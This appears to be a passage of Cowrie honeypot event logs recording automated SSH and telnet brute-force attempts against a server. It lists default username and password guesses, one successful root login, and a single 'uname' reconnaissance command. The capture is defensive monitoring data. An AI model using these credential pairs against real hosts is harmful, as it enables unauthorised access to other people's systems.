{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T03:25:12.435295Z","src_ip":"45.125.211.194","session":"ff8da7dc0ad8"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:25:12.616635Z","src_ip":"212.227.235.229","session":"cae7d287dbd2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:25:13.146985Z","src_ip":"212.227.235.229","session":"cae7d287dbd2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:25:13.147735Z","src_ip":"212.227.235.229","session":"cae7d287dbd2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:13.402521Z","src_ip":"212.227.235.229","session":"cae7d287dbd2"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:13.403751Z","src_ip":"212.227.235.229","session":"cae7d287dbd2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:13.646355Z","src_ip":"45.125.211.194","session":"ff8da7dc0ad8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41666,"dst_ip":"1.2.3.4","dst_port":22,"session":"902b29c6187b","protocol":"ssh","message":"New connection: 212.227.125.160:41666 (1.2.3.4:22) [session: 902b29c6187b]","sensor":"my-vps","timestamp":"2025-08-28T03:25:14.432168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:25:14.433007Z","src_ip":"212.227.125.160","session":"902b29c6187b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:25:14.648885Z","src_ip":"212.227.125.160","session":"902b29c6187b"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp123","message":"login attempt [uftp/uftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:25:15.298961Z","src_ip":"212.227.125.160","session":"902b29c6187b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:16.517241Z","src_ip":"212.227.125.160","session":"902b29c6187b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46112,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c8fd8b9bf0e","protocol":"ssh","message":"New connection: 212.227.235.229:46112 (1.2.3.4:22) [session: 2c8fd8b9bf0e]","sensor":"my-vps","timestamp":"2025-08-28T03:25:20.065968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:25:20.320536Z","src_ip":"212.227.235.229","session":"2c8fd8b9bf0e"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:25:20.713543Z","src_ip":"212.227.235.229","session":"2c8fd8b9bf0e"}
{"eventid":"cowrie.login.failed","username":"karthavya","password":"karthavya","message":"login attempt [karthavya/karthavya] failed","sensor":"my-vps","timestamp":"2025-08-28T03:25:21.304812Z","src_ip":"212.227.235.229","session":"2c8fd8b9bf0e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:22.405424Z","src_ip":"212.227.235.229","session":"2c8fd8b9bf0e"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":28941,"dst_ip":"1.2.3.4","dst_port":22,"session":"4515adee5ebd","protocol":"ssh","message":"New connection: 45.125.211.194:28941 (1.2.3.4:22) [session: 4515adee5ebd]","sensor":"my-vps","timestamp":"2025-08-28T03:25:26.247358Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:25:26.267102Z","src_ip":"45.125.211.194","session":"4515adee5ebd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:25:26.455175Z","src_ip":"45.125.211.194","session":"4515adee5ebd"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-28T03:25:27.284353Z","src_ip":"45.125.211.194","session":"4515adee5ebd"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:28.493941Z","src_ip":"45.125.211.194","session":"4515adee5ebd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57402,"dst_ip":"1.2.3.4","dst_port":23,"session":"de0c5bfabbbf","protocol":"telnet","message":"New connection: 212.227.125.160:57402 (1.2.3.4:23) [session: de0c5bfabbbf]","sensor":"my-vps","timestamp":"2025-08-28T03:25:39.978995Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37842,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cd5300dc893","protocol":"ssh","message":"New connection: 212.227.235.229:37842 (1.2.3.4:22) [session: 9cd5300dc893]","sensor":"my-vps","timestamp":"2025-08-28T03:25:40.943340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:25:40.944310Z","src_ip":"212.227.235.229","session":"9cd5300dc893"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":18194,"dst_ip":"1.2.3.4","dst_port":22,"session":"47662c5ea011","protocol":"ssh","message":"New connection: 45.125.211.194:18194 (1.2.3.4:22) [session: 47662c5ea011]","sensor":"my-vps","timestamp":"2025-08-28T03:25:41.185630Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:25:41.191221Z","src_ip":"212.227.235.229","session":"9cd5300dc893"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:25:41.205411Z","src_ip":"45.125.211.194","session":"47662c5ea011"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:25:41.395199Z","src_ip":"45.125.211.194","session":"47662c5ea011"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-28T03:25:41.934006Z","src_ip":"212.227.235.229","session":"9cd5300dc893"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-28T03:25:42.233418Z","src_ip":"45.125.211.194","session":"47662c5ea011"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:43.183656Z","src_ip":"212.227.235.229","session":"9cd5300dc893"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:43.444318Z","src_ip":"45.125.211.194","session":"47662c5ea011"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48280,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed0c84caeb2f","protocol":"ssh","message":"New connection: 212.227.235.229:48280 (1.2.3.4:22) [session: ed0c84caeb2f]","sensor":"my-vps","timestamp":"2025-08-28T03:25:46.776211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:25:46.777203Z","src_ip":"212.227.235.229","session":"ed0c84caeb2f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:25:47.028881Z","src_ip":"212.227.235.229","session":"ed0c84caeb2f"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:25:47.786868Z","src_ip":"212.227.235.229","session":"ed0c84caeb2f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:49.041176Z","src_ip":"212.227.235.229","session":"ed0c84caeb2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47838,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e26ffcb7ec3","protocol":"ssh","message":"New connection: 212.227.125.160:47838 (1.2.3.4:22) [session: 3e26ffcb7ec3]","sensor":"my-vps","timestamp":"2025-08-28T03:25:49.770304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:25:49.770952Z","src_ip":"212.227.125.160","session":"3e26ffcb7ec3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:25:49.990221Z","src_ip":"212.227.125.160","session":"3e26ffcb7ec3"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-28T03:25:50.657235Z","src_ip":"212.227.125.160","session":"3e26ffcb7ec3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:51.880015Z","src_ip":"212.227.125.160","session":"3e26ffcb7ec3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58722,"dst_ip":"1.2.3.4","dst_port":22,"session":"052557bd5642","protocol":"ssh","message":"New connection: 212.227.235.229:58722 (1.2.3.4:22) [session: 052557bd5642]","sensor":"my-vps","timestamp":"2025-08-28T03:25:52.552083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:25:52.552838Z","src_ip":"212.227.235.229","session":"052557bd5642"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:25:52.799646Z","src_ip":"212.227.235.229","session":"052557bd5642"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-28T03:25:53.541932Z","src_ip":"212.227.235.229","session":"052557bd5642"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:54.790897Z","src_ip":"212.227.235.229","session":"052557bd5642"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":26995,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a7fdfc6df35","protocol":"ssh","message":"New connection: 45.125.211.194:26995 (1.2.3.4:22) [session: 2a7fdfc6df35]","sensor":"my-vps","timestamp":"2025-08-28T03:25:55.902941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:25:55.921397Z","src_ip":"45.125.211.194","session":"2a7fdfc6df35"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:25:56.134725Z","src_ip":"45.125.211.194","session":"2a7fdfc6df35"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-28T03:25:56.957897Z","src_ip":"45.125.211.194","session":"2a7fdfc6df35"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":54232,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7ef241cc212","protocol":"ssh","message":"New connection: 194.233.79.134:54232 (1.2.3.4:22) [session: b7ef241cc212]","sensor":"my-vps","timestamp":"2025-08-28T03:25:57.418120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:25:57.980348Z","src_ip":"194.233.79.134","session":"b7ef241cc212"}
